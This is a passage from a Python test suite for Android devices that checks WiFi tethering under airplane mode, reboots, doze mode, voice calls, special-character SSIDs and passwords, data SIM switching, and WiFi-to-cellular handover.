if not tethering_check_internet_connection(self.log, ads[0],
[ads[1]], 10, 5):
return False
finally:
if not wifi_tethering_cleanup(self.log, ads[0], [ads[1]]):
return False
return True
@TelephonyBaseTest.tel_test_wrap
def test_toggle_apm_during_active_wifi_tethering(self):
"""WiFi Tethering test: Toggle APM during active WiFi Tethering
1. DUT in LTE mode, idle.
2. DUT start 2.4G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
5. DUT toggle APM on, verify WiFi tethering stopped and PhoneB loses WiFi connection.
6. DUT toggle APM off, verify DUT has cellular data and Internet connection.
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_4G):
self.log.error("Verify 4G Internet access failed.")
return False
try:
ssid = rand_ascii_str(10)
if not wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=2,
do_cleanup=False,
ssid=ssid):
self.log.error("WiFi Tethering failed.")
return False
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
self.log.info(
"Provider turn on APM, verify no WiFi/data on Client.")
if not toggle_airplane_mode(self.log, ads[0], True):
self.log.error("Provider turn on APM failed.")
return False
time.sleep(WAIT_TIME_DATA_STATUS_CHANGE_DURING_WIFI_TETHERING)
if ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering not stopped.")
return False
if verify_http_connection(self.log, ads[1]):
self.log.error("Client should not have Internet connection.")
return False
wifi_info = ads[1].droid.wifiGetConnectionInfo()
self.log.info("WiFi Info: {}".format(wifi_info))
if wifi_info[WifiEnums.SSID_KEY] == ssid:
self.log.error(
"WiFi error. WiFi should not be connected. Info: {}".format(
wifi_info))
return False
self.log.info("Provider turn off APM.")
if not toggle_airplane_mode(self.log, ads[0], False):
self.log.error("Provider turn off APM failed.")
return False
time.sleep(WAIT_TIME_DATA_STATUS_CHANGE_DURING_WIFI_TETHERING)
if ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering should not be on.")
return False
if not verify_http_connection(self.log, ads[0]):
self.log.error("Provider should have Internet connection.")
return False
finally:
ads[1].droid.telephonyToggleDataConnection(True)
WifiUtils.wifi_reset(self.log, ads[1])
return True
@TelephonyBaseTest.tel_test_wrap
def test_tethering_entitlement_check(self):
"""Tethering Entitlement Check Test
Get tethering entitlement check result.
Returns:
True if entitlement check returns True.
"""
ad = self.android_devices[0]
result = ad.droid.carrierConfigIsTetheringModeAllowed(
TETHERING_MODE_WIFI, MAX_WAIT_TIME_TETHERING_ENTITLEMENT_CHECK)
self.log.info("{} tethering entitlement check result: {}.".format(
ad.serial, result))
return result
@TelephonyBaseTest.tel_test_wrap
def test_tethering_4g_to_2gwifi_stress(self):
"""Stress Test LTE to WiFi 2.4G Tethering
This is a stress test for "test_tethering_4g_to_2gwifi".
Default MINIMUM_SUCCESS_RATE is set to 95%.
Returns:
True if stress pass rate is higher than MINIMUM_SUCCESS_RATE.
False otherwise.
"""
MINIMUM_SUCCESS_RATE = .95
success_count = 0
fail_count = 0
for i in range(1, self.stress_test_number + 1):
ensure_phones_default_state(
self.log, [self.android_devices[0], self.android_devices[1]])
if self.test_tethering_4g_to_2gwifi():
success_count += 1
result_str = "Succeeded"
else:
fail_count += 1
result_str = "Failed"
self.log.info("Iteration {} {}. Current: {} / {} passed.".format(
i, result_str, success_count, self.stress_test_number))
self.log.info("Final Count - Success: {}, Failure: {} - {}%".format(
success_count, fail_count, str(100 * success_count / (
success_count + fail_count))))
if success_count / (
success_count + fail_count) >= MINIMUM_SUCCESS_RATE:
return True
else:
return False
@TelephonyBaseTest.tel_test_wrap
def test_tethering_wifi_ssid_quotes(self):
"""WiFi Tethering test: SSID name contains quotes.
1. Set SSID name with double quotes.
2. Start LTE to WiFi (2.4G) tethering.
3. Verify tethering.
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads):
self.log.error("Verify Internet access failed.")
return False
ssid = "\"" + rand_ascii_str(10) + "\""
self.log.info("Starting WiFi Tethering test with ssid: {}".format(
ssid))
return wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=10,
ssid=ssid)
@TelephonyBaseTest.tel_test_wrap
def test_tethering_wifi_password_escaping_characters(self):
"""WiFi Tethering test: password contains escape characters.
1. Set a password containing escape characters.
e.g.: '"DQ=/{Yqq;M=(^_3HzRvhOiL8S%`]w&l<Qp8qH)bs<4E9v_q=HLr^)}w$blA0Kg'
2. Start LTE to WiFi (2.4G) tethering.
3. Verify tethering.
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads):
self.log.error("Verify Internet access failed.")
return False
password = '"DQ=/{Yqq;M=(^_3HzRvhOiL8S%`]w&l<Qp8qH)bs<4E9v_q=HLr^)}w$blA0Kg'
self.log.info("Starting WiFi Tethering test with password: {}".format(
password))
return wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=10,
password=password)
def _test_start_wifi_tethering_connect_teardown(self, ad_host, ad_client,
ssid, password):
"""Private test util for WiFi Tethering.
1. Host start WiFi tethering.
2. Client connect to tethered WiFi.
3. Host tear down WiFi tethering.
Args:
ad_host: android device object for host
ad_client: android device object for client
ssid: WiFi tethering ssid
password: WiFi tethering password
Returns:
True if no error happens, otherwise False.
"""
result = True
# Turn off active SoftAP if any.
if ad_host.droid.wifiIsApEnabled():
WifiUtils.stop_wifi_tethering(self.log, ad_host)
time.sleep(WAIT_TIME_ANDROID_STATE_SETTLING)
if not WifiUtils.start_wifi_tethering(self.log, ad_host, ssid,
password,
WifiUtils.WIFI_CONFIG_APBAND_2G):
self.log.error("Provider start WiFi tethering failed.")
result = False
time.sleep(WAIT_TIME_ANDROID_STATE_SETTLING)
if not ensure_wifi_connected(self.log, ad_client, ssid, password):
self.log.error("Client connect to WiFi failed.")
result = False
if not WifiUtils.wifi_reset(self.log, ad_client):
self.log.error("Reset client WiFi failed. {}".format(
ad_client.serial))
result = False
if not WifiUtils.stop_wifi_tethering(self.log, ad_host):
self.log.error("Provider stop WiFi tethering failed.")
result = False
return result
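Unlike the exception-based flow used earlier, this helper accumulates a boolean `result` so every teardown step still runs after a failure. A compact sketch of that accumulate-and-continue idiom (the step callables are illustrative stand-ins for the tethering calls):

```python
def run_all_steps(steps):
    """Run every step even after a failure; return overall success."""
    result = True
    for name, step in steps:
        if not step():
            # Remember the failure but keep going so later
            # cleanup steps (reset WiFi, stop tethering) still run.
            result = False
    return result

# All three steps execute even though the middle one fails.
ran = []
ok = run_all_steps([
    ("start", lambda: ran.append("start") or True),
    ("connect", lambda: ran.append("connect") or False),
    ("teardown", lambda: ran.append("teardown") or True),
])
```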
@TelephonyBaseTest.tel_test_wrap
def test_tethering_wifi_ssid(self):
"""WiFi Tethering test: start WiFi tethering with all kinds of SSIDs.
For each listed SSID, start WiFi tethering on DUT, client connect WiFi,
then tear down WiFi tethering.
Returns:
True if WiFi tethering succeed on all SSIDs.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_4G):
self.log.error("Setup Failed.")
return False
ssid_list = [" !\"#$%&'()*+,-./0123456789:;<=>?",
"@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_",
"`abcdefghijklmnopqrstuvwxyz{|}~", " a ", "!b!", "#c#",
"$d$", "%e%", "&f&", "'g'", "(h(", ")i)", "*j*", "+k+",
"-l-", ".m.", "/n/", "_",
" !\"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}",
"\u0644\u062c\u0648\u062c", "\u8c37\u6b4c", "\uad6c\uae00",
"\u30b0\u30fc\u30eb",
"\u0417\u0434\u0440\u0430\u0432\u0441\u0442\u0443\u0439"]
fail_list = {}
for ssid in ssid_list:
password = rand_ascii_str(8)
self.log.info("SSID: <{}>, Password: <{}>".format(ssid, password))
if not self._test_start_wifi_tethering_connect_teardown(
ads[0], ads[1], ssid, password):
fail_list[ssid] = password
if (len(fail_list) > 0):
self.log.error("Failed cases: {}".format(fail_list))
return False
else:
return True
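The SSID sweep above collects failures in a dict keyed by SSID so one log line can summarize every failing case at the end. A minimal sketch of that pattern (the `try_case` callable stands in for the tethering round-trip helper):

```python
def sweep_cases(cases, try_case):
    """Run try_case(ssid, password) for each case.

    Returns a dict mapping each failing SSID to its password,
    empty when every case passes.
    """
    fail_list = {}
    for ssid, password in cases:
        if not try_case(ssid, password):
            fail_list[ssid] = password
    return fail_list

# One case fails, so it is the only entry reported.
failures = sweep_cases([("good", "pw1"), ("bad", "pw2")],
                       lambda s, p: s != "bad")
print(failures)  # {'bad': 'pw2'}
```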
@TelephonyBaseTest.tel_test_wrap
def test_tethering_wifi_password(self):
"""WiFi Tethering test: start WiFi tethering with all kinds of passwords.
For each listed password, start WiFi tethering on DUT, client connect WiFi,
then tear down WiFi tethering.
Returns:
True if WiFi tethering succeed on all passwords.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_4G):
self.log.error("Setup Failed.")
return False
password_list = [
" !\"#$%&'()*+,-./0123456789:;<=>?",
"@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_",
"`abcdefghijklmnopqrstuvwxyz{|}~",
" !\"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}", "abcdefgh",
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!",
" a12345 ", "!b12345!", "#c12345#", "$d12345$", "%e12345%",
"&f12345&", "'g12345'", "(h12345(", ")i12345)", "*j12345*",
"+k12345+", "-l12345-", ".m12345.", "/n12345/"
]
fail_list = {}
for password in password_list:
result = True
ssid = rand_ascii_str(8)
self.log.info("SSID: <{}>, Password: <{}>".format(ssid, password))
if not self._test_start_wifi_tethering_connect_teardown(
ads[0], ads[1], ssid, password):
fail_list[ssid] = password
if (len(fail_list) > 0):
self.log.error("Failed cases: {}".format(fail_list))
return False
else:
return True
def _test_tethering_wifi_and_voice_call(
self, provider, client, provider_data_rat, provider_setup_func,
provider_in_call_check_func):
if not self._test_setup_tethering(
[provider, client], provider_data_rat):
self.log.error("Verify Internet access failed.")
return False
tasks = [(provider_setup_func, (self.log, provider)),
(phone_setup_voice_general, (self.log, client))]
if not multithread_func(self.log, tasks):
self.log.error("Phone failed to set up in the requested mode.")
return False
try:
self.log.info("1. Setup WiFi Tethering.")
if not wifi_tethering_setup_teardown(
self.log,
provider,
[client],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=2,
do_cleanup=False):
self.log.error("WiFi Tethering failed.")
return False
self.log.info("2. Make outgoing call.")
if not call_setup_teardown(
self.log,
provider,
client,
ad_hangup=None,
verify_caller_func=provider_in_call_check_func):
self.log.error("Setup Call Failed.")
return False
self.log.info("3. Verify data.")
if not verify_http_connection(self.log, provider):
self.log.error("Provider has no Internet access.")
if not verify_http_connection(self.log, client):
self.log.error("Client has no Internet access.")
hangup_call(self.log, provider)
time.sleep(WAIT_TIME_BETWEEN_REG_AND_CALL)
self.log.info("4. Make incoming call.")
if not call_setup_teardown(
self.log,
client,
provider,
ad_hangup=None,
verify_callee_func=provider_in_call_check_func):
self.log.error("Setup Call Failed.")
return False
self.log.info("5. Verify data.")
if not verify_http_connection(self.log, provider):
self.log.error("Provider has no Internet access.")
if not verify_http_connection(self.log, client):
self.log.error("Client has no Internet access.")
hangup_call(self.log, provider)
finally:
if not wifi_tethering_cleanup(self.log, provider, [client]):
return False
return True

    @TelephonyBaseTest.tel_test_wrap
    def test_tethering_wifi_volte_call(self):
        """WiFi Tethering test: VoLTE call during WiFi tethering.

        1. Start LTE to WiFi (2.4G) tethering.
        2. Verify tethering.
        3. Make outgoing VoLTE call on tethering provider.
        4. Verify tethering still works.
        5. Make incoming VoLTE call on tethering provider.
        6. Verify tethering still works.

        Returns:
            True if success.
            False if failed.
        """
        return self._test_tethering_wifi_and_voice_call(
            self.android_devices[0], self.android_devices[1], RAT_4G,
            phone_setup_volte, is_phone_in_call_volte)

    @TelephonyBaseTest.tel_test_wrap
    def test_tethering_wifi_csfb_call(self):
        """WiFi Tethering test: CSFB call during WiFi tethering.

        1. Start LTE to WiFi (2.4G) tethering.
        2. Verify tethering.
        3. Make outgoing CSFB call on tethering provider.
        4. Verify tethering still works.
        5. Make incoming CSFB call on tethering provider.
        6. Verify tethering still works.

        Returns:
            True if success.
            False if failed.
        """
        return self._test_tethering_wifi_and_voice_call(
            self.android_devices[0], self.android_devices[1], RAT_4G,
            phone_setup_csfb, is_phone_in_call_csfb)

    @TelephonyBaseTest.tel_test_wrap
    def test_tethering_wifi_3g_call(self):
        """WiFi Tethering test: 3G call during WiFi tethering.

        1. Start 3G to WiFi (2.4G) tethering.
        2. Verify tethering.
        3. Make outgoing CS call on tethering provider.
        4. Verify tethering still works.
        5. Make incoming CS call on tethering provider.
        6. Verify tethering still works.

        Returns:
            True if success.
            False if failed.
        """
        return self._test_tethering_wifi_and_voice_call(
            self.android_devices[0], self.android_devices[1], RAT_3G,
            phone_setup_voice_3g, is_phone_in_call_3g)

    @TelephonyBaseTest.tel_test_wrap
    def test_tethering_wifi_no_password(self):
        """WiFi Tethering test: Start WiFi tethering with no password.

        1. DUT is idle.
        2. DUT starts 2.4G WiFi Tethering, with no WiFi password.
        3. PhoneB disables data and connects to DUT's softAP.
        4. Verify Internet access on DUT and PhoneB.

        Returns:
            True if success.
            False if failed.
        """
        ads = self.android_devices
        if not self._test_setup_tethering(ads):
            self.log.error("Verify Internet access failed.")
            return False

        return wifi_tethering_setup_teardown(
            self.log,
            ads[0],
            [ads[1]],
            ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
            check_interval=10,
            check_iteration=10,
            password="")

    @TelephonyBaseTest.tel_test_wrap
    def test_tethering_wifi_reboot(self):
        """WiFi Tethering test: Start WiFi tethering, then reboot the device.

        1. DUT is idle.
        2. DUT starts 2.4G WiFi Tethering.
        3. PhoneB disables data and connects to DUT's softAP.
        4. Verify Internet access on DUT and PhoneB.
        5. Reboot DUT.
        6. After DUT reboots, verify tethering is stopped.

        Returns:
            True if success.
            False if failed.
        """
        ads = self.android_devices
        if not self._test_setup_tethering(ads):
            self.log.error("Verify Internet access failed.")
            return False
        try:
            if not wifi_tethering_setup_teardown(
                    self.log,
                    ads[0],
                    [ads[1]],
                    ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
                    check_interval=10,
                    check_iteration=2,
                    do_cleanup=False):
                self.log.error("WiFi Tethering failed.")
                return False
            if not ads[0].droid.wifiIsApEnabled():
                self.log.error("Provider WiFi tethering stopped.")
                return False

            self.log.info("Reboot DUT:{}".format(ads[0].serial))
            ads[0].reboot()
            time.sleep(WAIT_TIME_AFTER_REBOOT +
                       WAIT_TIME_TETHERING_AFTER_REBOOT)

            self.log.info("After reboot, check if tethering stopped.")
            if ads[0].droid.wifiIsApEnabled():
                self.log.error("Provider WiFi tethering did NOT stop.")
                return False
        finally:
            ads[1].droid.telephonyToggleDataConnection(True)
            WifiUtils.wifi_reset(self.log, ads[1])
            if ads[0].droid.wifiIsApEnabled():
                WifiUtils.stop_wifi_tethering(self.log, ads[0])
        return True

    @TelephonyBaseTest.tel_test_wrap
    def test_connect_wifi_start_tethering_wifi_reboot(self):
        """WiFi Tethering test: WiFi connected, then start WiFi tethering,
        then reboot the device.

        Initial Condition: DUT in 4G mode, idle, DUT connected to WiFi.

        1. DUT starts 2.4G WiFi Tethering.
        2. PhoneB disables data and connects to DUT's softAP.
        3. Verify Internet access on DUT and PhoneB.
        4. Reboot DUT.
        5. After DUT reboots, verify tethering is stopped and DUT is able to
           connect to the previous WiFi AP.

        Returns:
            True if success.
            False if failed.
        """
        ads = self.android_devices
        if not self._test_setup_tethering(ads):
            self.log.error("Verify Internet access failed.")
            return False

        self.log.info("Make sure DUT can connect to live network by WiFi")
        if ((not ensure_wifi_connected(self.log, ads[0],
                                       self.wifi_network_ssid,
                                       self.wifi_network_pass)) or
                (not verify_http_connection(self.log, ads[0]))):
            self.log.error("WiFi connect failed.")
            return False
        try:
            if not wifi_tethering_setup_teardown(
                    self.log,
                    ads[0],
                    [ads[1]],
                    ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
                    check_interval=10,
                    check_iteration=2,
                    do_cleanup=False):
                self.log.error("WiFi Tethering failed.")
                return False
            if not ads[0].droid.wifiIsApEnabled():
                self.log.error("Provider WiFi tethering stopped.")
                return False

            self.log.info("Reboot DUT:{}".format(ads[0].serial))
            ads[0].reboot()
            time.sleep(WAIT_TIME_AFTER_REBOOT)
            time.sleep(WAIT_TIME_TETHERING_AFTER_REBOOT)

            self.log.info("After reboot, check if tethering stopped.")
            if ads[0].droid.wifiIsApEnabled():
                self.log.error("Provider WiFi tethering did NOT stop.")
                return False

            self.log.info("Make sure WiFi can connect automatically.")
            if (not wait_for_wifi_data_connection(self.log, ads[0], True) or
                    not verify_http_connection(self.log, ads[0])):
                self.log.error("Data did not return to WiFi")
                return False
        finally:
            ads[1].droid.telephonyToggleDataConnection(True)
            WifiUtils.wifi_reset(self.log, ads[1])
            if ads[0].droid.wifiIsApEnabled():
                WifiUtils.stop_wifi_tethering(self.log, ads[0])
        return True

    @TelephonyBaseTest.tel_test_wrap
    def test_connect_wifi_reboot_start_tethering_wifi(self):
        """WiFi Tethering test: DUT connected to WiFi, then reboot.
        After reboot, start WiFi tethering and verify it actually works.

        Initial Condition: Device set to 4G mode, idle, DUT connected to WiFi.

        1. Verify Internet is working on DUT (by WiFi).
        2. Reboot DUT.
        3. DUT starts 2.4G WiFi Tethering.
        4. PhoneB disables data and connects to DUT's softAP.
        5. Verify Internet access on DUT and PhoneB.

        Returns:
            True if success.
            False if failed.
        """
        ads = self.android_devices
        if not self._test_setup_tethering(ads):
            self.log.error("Verify Internet access failed.")
            return False

        self.log.info("Make sure DUT can connect to live network by WiFi")
        if ((not ensure_wifi_connected(self.log, ads[0],
                                       self.wifi_network_ssid,
                                       self.wifi_network_pass)) or
                (not verify_http_connection(self.log, ads[0]))):
            self.log.error("WiFi connect failed.")
            return False

        self.log.info("Reboot DUT:{}".format(ads[0].serial))
        ads[0].reboot()
        time.sleep(WAIT_TIME_AFTER_REBOOT)
        time.sleep(WAIT_TIME_TETHERING_AFTER_REBOOT)

        return wifi_tethering_setup_teardown(
            self.log,
            ads[0],
            [ads[1]],
            ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
            check_interval=10,
            check_iteration=10)

    @TelephonyBaseTest.tel_test_wrap
    def test_tethering_wifi_screen_off_enable_doze_mode(self):
        """WiFi Tethering test: Start WiFi tethering, then turn off DUT's
        screen, then enable doze mode.

        1. Start WiFi tethering on DUT.
        2. PhoneB disables data and connects to DUT's softAP.
        3. Verify Internet access on DUT and PhoneB.
        4. Turn off DUT's screen. Wait for 1 minute and
           verify Internet access on Client PhoneB.
        5. Enable doze mode on DUT. Wait for 1 minute and
           verify Internet access on Client PhoneB.

        Returns:
            True if success.
            False if failed.
        """
        ads = self.android_devices
        if not self._test_setup_tethering(ads):
            self.log.error("Verify Internet access failed.")
            return False
        try:
            if not wifi_tethering_setup_teardown(
                    self.log,
                    ads[0],
                    [ads[1]],
                    ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
                    check_interval=10,
                    check_iteration=2,
                    do_cleanup=False):
                self.log.error("WiFi Tethering failed.")
                return False
            if not ads[0].droid.wifiIsApEnabled():
                self.log.error("Provider WiFi tethering stopped.")
                return False

            self.log.info("Turn off screen on provider: <{}>.".format(
                ads[0].serial))
            ads[0].droid.goToSleepNow()
            time.sleep(60)
            if not verify_http_connection(self.log, ads[1]):
                self.log.error("Client has no Internet access.")
                return False

            self.log.info("Enable doze mode on provider: <{}>.".format(
                ads[0].serial))
            if not enable_doze(ads[0]):
                self.log.error("Failed to enable doze mode.")
                return False
            time.sleep(60)
            if not verify_http_connection(self.log, ads[1]):
                self.log.error("Client has no Internet access.")
                return False
        finally:
            self.log.info("Disable doze mode.")
            if not disable_doze(ads[0]):
                self.log.error("Failed to disable doze mode.")
                return False
            if not wifi_tethering_cleanup(self.log, ads[0], [ads[1]]):
                return False
        return True

    @TelephonyBaseTest.tel_test_wrap
    def test_msim_switch_data_sim_2g(self):
        """Switch Data SIM on 2G network.

        Steps:
            1. Data on default Data SIM.
            2. Switch Data to another SIM. Make sure data is still available.
            3. Switch Data back to the previous SIM. Make sure data is still
               available.

        Expected Results:
            1. Data is available on the default Data SIM.
            2. Data is available after switching to the other SIM.
            3. Data is available after switching back to the original SIM.

        Returns:
            True if success.
            False if failed.
        """
        ad = self.android_devices[0]
        current_data_sub_id = ad.droid.subscriptionGetDefaultDataSubId()
        current_sim_slot_index = get_slot_index_from_subid(
            self.log, ad, current_data_sub_id)
        if current_sim_slot_index == SIM1_SLOT_INDEX:
            next_sim_slot_index = SIM2_SLOT_INDEX
        else:
            next_sim_slot_index = SIM1_SLOT_INDEX
        next_data_sub_id = get_subid_from_slot_index(self.log, ad,
                                                     next_sim_slot_index)
        self.log.info("Current Data is on subId: {}, SIM slot: {}".format(
            current_data_sub_id, current_sim_slot_index))
        if not ensure_network_generation_for_subscription(
                self.log, ad, ad.droid.subscriptionGetDefaultDataSubId(),
                GEN_2G, voice_or_data=NETWORK_SERVICE_DATA):
            self.log.error("Device data does not attach to 2G.")
            return False
        if not verify_http_connection(self.log, ad):
            self.log.error("No Internet access on default Data SIM.")
            return False

        self.log.info("Change Data to subId: {}, SIM slot: {}".format(
            next_data_sub_id, next_sim_slot_index))
        if not change_data_sim_and_verify_data(self.log, ad,
                                               next_sim_slot_index):
            self.log.error("Failed to change data SIM.")
            return False

        next_data_sub_id = current_data_sub_id
        next_sim_slot_index = current_sim_slot_index
        self.log.info("Change Data back to subId: {}, SIM slot: {}".format(
            next_data_sub_id, next_sim_slot_index))
        if not change_data_sim_and_verify_data(self.log, ad,
                                               next_sim_slot_index):
            self.log.error("Failed to change data SIM.")
            return False
        return True

    def _test_wifi_connect_disconnect(self):
        """Perform multiple connects and disconnects from WiFi and verify that
        data switches between WiFi and Cell.

        Steps:
            1. Reset WiFi on DUT.
            2. Connect DUT to a WiFi AP.
            3. Repeat steps 1-2, alternately disconnecting and disabling WiFi.

        Expected Results:
            1. Verify Data on Cell.
            2. Verify Data on WiFi.

        Returns:
            True if success.
            False if failed.
        """
        ad = self.android_devices[0]
        wifi_toggles = [
            True, False, True, False, False, True, False, False, False, False,
            True, False, False, False, False, False, False, False, False
        ]
        for toggle in wifi_toggles:
            WifiUtils.wifi_reset(self.log, ad, toggle)
            if not wait_for_cell_data_connection(
                    self.log, ad, True, MAX_WAIT_TIME_WIFI_CONNECTION):
                self.log.error("Failed cell data connection, aborting!")
                return False
            if not verify_http_connection(self.log, ad,
                                          'http://www.google.com', 100, .1):
                self.log.error("Failed to get user-plane traffic, aborting!")
                return False
            if toggle:
                WifiUtils.wifi_toggle_state(self.log, ad, True)
            WifiUtils.wifi_connect(self.log, ad, self.wifi_network_ssid,
                                   self.wifi_network_pass)
            if not wait_for_wifi_data_connection(
                    self.log, ad, True, MAX_WAIT_TIME_WIFI_CONNECTION):
                self.log.error("Failed wifi connection, aborting!")
                return False
            if not verify_http_connection(self.log, ad,
                                          'http://www.google.com', 100, .1):
                self.log.error("Failed to get user-plane traffic, aborting!")
                return False
        return True

    @TelephonyBaseTest.tel_test_wrap
    def test_wifi_connect_disconnect_4g(self):
        """Perform multiple connects and disconnects from WiFi and verify that
        data switches between WiFi and Cell.

        Steps:
            1. DUT Cellular Data is on 4G. Reset WiFi on DUT.
            2. Connect DUT to a WiFi AP.
            3. Repeat steps 1-2, alternately disconnecting and disabling WiFi.

        Expected Results:
            1. Verify Data on Cell.
            2. Verify Data on WiFi.

        Returns:
            True if success.
            False if failed.
        """
        ad = self.android_devices[0]
        if not ensure_network_generation_for_subscription(
                self.log, ad, ad.droid.subscriptionGetDefaultDataSubId(),
                GEN_4G, MAX_WAIT_TIME_NW_SELECTION, NETWORK_SERVICE_DATA):
            self.log.error("Device {} failed to reselect in {}s.".format(
                ad.serial, MAX_WAIT_TIME_NW_SELECTION))
            return False
        return self._test_wifi_connect_disconnect()

    @TelephonyBaseTest.tel_test_wrap
    def test_wifi_connect_disconnect_3g(self):
        """Perform multiple connects and disconnects from WiFi and verify that
        data switches between WiFi and Cell.

        Steps:
            1. DUT Cellular Data is on 3G. Reset WiFi on DUT.
            2. Connect DUT to a WiFi AP.
            3. Repeat steps 1-2, alternately disconnecting and disabling WiFi.

        Expected Results:
            1. Verify Data on Cell.
            2. Verify Data on WiFi.

        Returns:
            True if success.
            False if failed.
        """
        ad = self.android_devices[0]
        if not ensure_network_generation_for_subscription(
                self.log, ad, ad.droid.subscriptionGetDefaultDataSubId(),
                GEN_3G, MAX_WAIT_TIME_NW_SELECTION, NETWORK_SERVICE_DATA):
            self.log.error("Device {} failed to reselect in {}s.".format(
                ad.serial, MAX_WAIT_TIME_NW_SELECTION))
            return False
        return self._test_wifi_connect_disconnect()

    @TelephonyBaseTest.tel_test_wrap
    def test_wifi_connect_disconnect_2g(self):
        """Perform multiple connects and disconnects from WiFi and verify that
        data switches between WiFi and Cell.

        Steps:
            1. DUT Cellular Data is on 2G. Reset WiFi on DUT.
            2. Connect DUT to a WiFi AP.
            3. Repeat steps 1-2, alternately disconnecting and disabling WiFi.

        Expected Results:
            1. Verify Data on Cell.
            2. Verify Data on WiFi.

        Returns:
            True if success.
            False if failed.
        """
        ad = self.android_devices[0]
        if not ensure_network_generation_for_subscription(
                self.log, ad, ad.droid.subscriptionGetDefaultDataSubId(),
                GEN_2G, MAX_WAIT_TIME_NW_SELECTION, NETWORK_SERVICE_DATA):
            self.log.error("Device {} failed to reselect in {}s.".format(
                ad.serial, MAX_WAIT_TIME_NW_SELECTION))
            return False
        return self._test_wifi_connect_disconnect()

    def _test_wifi_tethering_enabled_add_voice_call(
            self, network_generation, voice_call_direction,
            is_data_available_during_call):
        """Tethering enabled + voice call.

        Steps:
            1. DUT data is on <network_generation>. Start WiFi Tethering.
            2. PhoneB connects to DUT's softAP.
            3. DUT makes a MO/MT (<voice_call_direction>) phone call.
            4. DUT ends the phone call.

        Expected Results:
            1. DUT is able to start WiFi tethering.
            2. PhoneB connected to DUT's softAP and able to browse Internet.
            3. DUT WiFi tethering is still on. Phone call works OK.
               If is_data_available_during_call is True, then PhoneB still has
               Internet access.
               Otherwise, data is suspended and PhoneB has no Internet access.
            4. WiFi Tethering still on, voice call stopped, and PhoneB has
               Internet access.

        Returns:
            True if success.
            False if failed.
        """
        ads = self.android_devices
        if not self._test_setup_tethering(ads, network_generation):
            self.log.error("Verify Internet access failed.")
            return False
        try:
            # Start WiFi Tethering
            if not wifi_tethering_setup_teardown(
                    self.log,
                    ads[0],
                    [ads[1]],
                    ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
                    check_interval=10,
                    check_iteration=2,
                    do_cleanup=False):
                self.log.error("WiFi Tethering failed.")
                return False
            if not ads[0].droid.wifiIsApEnabled():
                self.log.error("Provider WiFi tethering stopped.")
                return False

            # Make a voice call
            if voice_call_direction == DIRECTION_MOBILE_ORIGINATED:
                ad_caller = ads[0]
                ad_callee = ads[1]
            else:
                ad_caller = ads[1]
                ad_callee = ads[0]
            if not call_setup_teardown(self.log, ad_caller, ad_callee, None,
                                       None, None):
                self.log.error("Failed to Establish {} Voice Call".format(
                    voice_call_direction))
                return False

            # Tethering should still be on.
            if not ads[0].droid.wifiIsApEnabled():
                self.log.error("Provider WiFi tethering stopped.")
                return False
            if not is_data_available_during_call:
                if verify_http_connection(self.log, ads[1], retry=0):
                    self.log.error("Client should not have Internet Access.")
                    return False
            else:
                if not verify_http_connection(self.log, ads[1]):
                    self.log.error("Client should have Internet Access.")
                    return False

            # Hang up the call. Client should have data again.
            if not hangup_call(self.log, ads[0]):
                self.log.error("Failed to hang up call")
                return False
            if not ads[0].droid.wifiIsApEnabled():
                self.log.error("Provider WiFi tethering stopped.")
                return False
            if not verify_http_connection(self.log, ads[1]):
                self.log.error("Client should have Internet Access.")
                return False
        finally:
            ads[1].droid.telephonyToggleDataConnection(True)
            WifiUtils.wifi_reset(self.log, ads[1])
            if ads[0].droid.wifiIsApEnabled():
                WifiUtils.stop_wifi_tethering(self.log, ads[0])
        return True

    @TelephonyBaseTest.tel_test_wrap
    def test_wifi_tethering_enabled_add_mo_voice_call_2g_dsds(self):
        """Tethering enabled + MO voice call.

        Steps:
            1. DUT is a DSDS device with data on 2G. Start WiFi Tethering on
               <Data SIM>.
            2. PhoneB connects to DUT's softAP.
            3. DUT makes an MO phone call on <Voice SIM>.
            4. DUT ends the phone call.

        Expected Results:
            1. DUT is able to start WiFi tethering.
            2. PhoneB connected to DUT's softAP and able to browse Internet.
            3. DUT WiFi tethering is still on. Phone call works OK. Data is
               suspended; PhoneB is still connected to DUT's softAP, but no
               data is available.
            4. DUT data resumes, and PhoneB has Internet access.

        Returns:
            True if success.
            False if failed.
        """
        return self._test_wifi_tethering_enabled_add_voice_call(
            GEN_2G, DIRECTION_MOBILE_ORIGINATED, False)

    @TelephonyBaseTest.tel_test_wrap
    def test_wifi_tethering_enabled_add_mt_voice_call_2g_dsds(self):
        """Tethering enabled + MT voice call.

        Steps:
            1. DUT is a DSDS device with data on 2G. Start WiFi Tethering on
               <Data SIM>.
            2. PhoneB connects to DUT's softAP.
            3. DUT receives an MT phone call on <Voice SIM>.
            4. DUT ends the phone call.

        Expected Results:
